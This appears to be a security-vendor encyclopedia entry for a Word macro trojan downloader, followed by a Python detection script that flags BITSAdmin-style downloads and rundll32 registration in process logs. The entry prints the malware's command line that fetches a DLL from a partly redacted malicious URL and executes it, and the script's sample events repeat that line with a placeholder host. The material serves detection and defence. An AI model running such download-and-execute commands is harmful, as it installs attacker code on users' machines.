Trojan.W97M.BITSLODR.POL
Publish Date: 17 March 2020
TrojanDownloader:O97M/Powdow.ARJ!MTB (Microsoft); VBA/TrojanDownloader.Agent.RZD trojan (NOD32)
Platform:
Windows
Overall Risk:
Potential damage:
Potential distribution:
Reported infection:
Information Exposure Rating:
Low
Medium
High
Critical
Grayware type:
Trojan
Destructive:
No
Encryption:
In the wild:
Yes
Overview
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Technical details
File size: 93,441 bytes
Memory resident: No
Date first samples received: 13 March 2020
Arrival details
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
Drops the following files:
- %Temp%\curl.com
Adds the following processes:
- "%System%\cmd.exe" /c %Temp%\curl.com /transfer jobname http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab %Temp%\12345.dll&& rundll32 %Temp%\12345.dll,DllRegisterServer
Other details
It connects to the following possibly malicious URL:
- http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab
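The process command line listed above is the BITSAdmin transfer syntax (`/transfer <jobname> <url> <localfile>`) invoked through a file named `curl.com` in `%Temp%`, with the downloaded file immediately loaded via `rundll32 ...,DllRegisterServer`. A defender can look for exactly that combination in process-creation telemetry. The script below is an added example, not code from the original page or from Trend Micro: it runs a small set of rules over constructed process-creation events (the domain `example.invalid`, paths and PIDs are placeholders) and returns a finding per matching event, scoring higher when the BITS syntax is invoked through a binary not named `bitsadmin`, the destination is a temp directory, and the same command line registers the downloaded file with `rundll32`.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# BITSAdmin transfer syntax: <tool> /transfer <job> <url> <localfile>.
# The destination token stops at '&' or '|' so a chained command is not absorbed.
TRANSFER_RE = re.compile(
    r'(?P<tool>[^\s"]+)\s+/transfer\s+(?P<job>\S+)\s+(?P<url>https?://\S+)\s+(?P<dest>[^\s&|]+)',
    re.IGNORECASE,
)
# rundll32 <dll>,DllRegisterServer in the same command line.
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+(?P<dll>[^\s,]+),DllRegisterServer', re.IGNORECASE)
# Common temp directories on Windows.
TEMP_RE = re.compile(r'\\(?:AppData\\Local\\Temp|Windows\\Temp)\\', re.IGNORECASE)

# Constructed sample events (hypothetical; not taken from the original page).
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c C:\Users\u\AppData\Local\Temp\curl.com /transfer jobname '
                     r'http://example.invalid/f64bj/x.php?l=a.cab C:\Users\u\AppData\Local\Temp\12345.dll'
                     r'&& rundll32 C:\Users\u\AppData\Local\Temp\12345.dll,DllRegisterServer'},
    {"pid": 1002, "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r'bitsadmin /transfer updatejob https://updates.example.invalid/patch.msi C:\ProgramData\Updates\patch.msi'},
    {"pid": 1003, "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL'},
    {"pid": 1004, "image": r"C:\tools\bits.exe",
     "command_line": r'C:\tools\bits.exe /transfer j http://example.invalid/a.txt C:\tools\a.txt'},
]


@dataclass
class Finding:
    pid: int
    severity: str
    url: str
    reasons: List[str]


def tool_name(token: str) -> str:
    """Return the lower-case basename of the invoked tool without a trailing .exe."""
    name = token.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def analyze_event(event: dict) -> Optional[Finding]:
    """Return a Finding if the command line uses the BITS transfer syntax, else None."""
    cmd = event["command_line"]
    m = TRANSFER_RE.search(cmd)
    if not m:
        return None
    reasons = []
    tool = tool_name(m["tool"])
    if tool != "bitsadmin":
        reasons.append(f"BITS /transfer syntax invoked through non-standard binary name '{tool}'")
    if TEMP_RE.search(m["dest"]):
        reasons.append("download destination is a temp directory")
    r = RUNDLL_RE.search(cmd)
    if r and r["dll"].lower() == m["dest"].lower():
        reasons.append("downloaded file registered with rundll32 DllRegisterServer in the same command")
    if len(reasons) >= 2:
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "info"  # ordinary bitsadmin use; still worth logging the URL
    return Finding(event["pid"], severity, m["url"], reasons)


def analyze(events: List[dict]) -> List[Finding]:
    """Run analyze_event over a list of process-creation events and keep the hits."""
    return [f for f in map(analyze_event, events) if f is not None]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding.pid, finding.severity, finding.url, "; ".join(finding.reasons))
```

The three rules are deliberately independent so that a benign `bitsadmin /transfer` from patch management scores as informational while still surfacing the URL for allow-listing, whereas a renamed binary writing into `%Temp%` and immediately registering the result reaches the high tier on its own.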